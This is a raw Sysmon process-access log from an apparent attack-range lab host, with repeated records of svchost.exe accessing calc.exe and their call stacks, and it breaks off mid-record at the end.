10341000x8000000000000000361408Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361407Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361406Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361405Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361404Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361403Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361402Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361401Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361400Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361399Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361398Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361397Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361396Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361395Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361394Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361393Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361392Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361391Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361390Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361389Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361388Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361387Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361386Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 